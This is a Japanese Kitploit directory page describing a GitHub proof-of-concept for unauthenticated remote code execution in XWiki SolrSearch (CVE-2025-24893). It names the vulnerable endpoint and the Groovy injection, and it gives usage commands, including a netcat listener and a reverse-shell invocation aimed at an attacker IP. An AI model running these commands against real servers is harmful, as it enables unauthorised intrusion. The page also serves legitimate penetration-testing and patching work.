Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
xwiki_solrsearch-rce-exploit — XWiki SolrSearch(CVE-2025-24893)の未認証RCE PoC。コマンド実行+リバースシェル。 | Kitploit
ツール/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール学習と教育ペイロード開発
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

XWiki SolrSearch(CVE-2025-24893)の未認証RCE PoC。コマンド実行+リバースシェル。

リポジトリを見る
1129ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

solrsearch-rce-exploit

XWiki SolrSearch 用の認証不要 RCE PoC (CVE-2025-24893)。コマンド実行 + リバースシェル。

CVE-2025-24893 – XWiki SolrSearch RCE PoC

XWiki SolrSearch テンプレートインジェクションによる認証不要のリモートコード実行を実証する概念実証です。

XWiki Debian 15.10.8 でテスト済み (15.10.11 / 16.4.1 / 16.5.0RC1 で修正)。

⚠️ 教育目的のみ。所有していない、または明示的な許可を得ていないシステムに対して実行しないでください。

機能

  • 細工された Groovy ペイロードを /xwiki/bin/get/Main/SolrSearch 経由で送信します。
  • 任意のコマンドを実行し、出力を Base64 マーカーでラップしてクリーンにデコードできるようにします。
  • Java ソケットを使用したリバースシェルの起動をサポートします。

必要条件

  • Python 3.x
  • 依存関係をインストール:
root@kitploit:~
pip install requests

使い方

スクリプト実行時にターゲットホスト (およびオプションのパス) を指定します。

基本的なコマンドを実行:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

リバースシェルを開始:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

注意事項

  • エンドポイント: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • クリーンな Base64 出力により信頼性の高い解析が可能です。
  • 当初は HTB Editor で実証されましたが、他の脆弱なインスタンスにも適用可能です。
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
ツールをダウンロード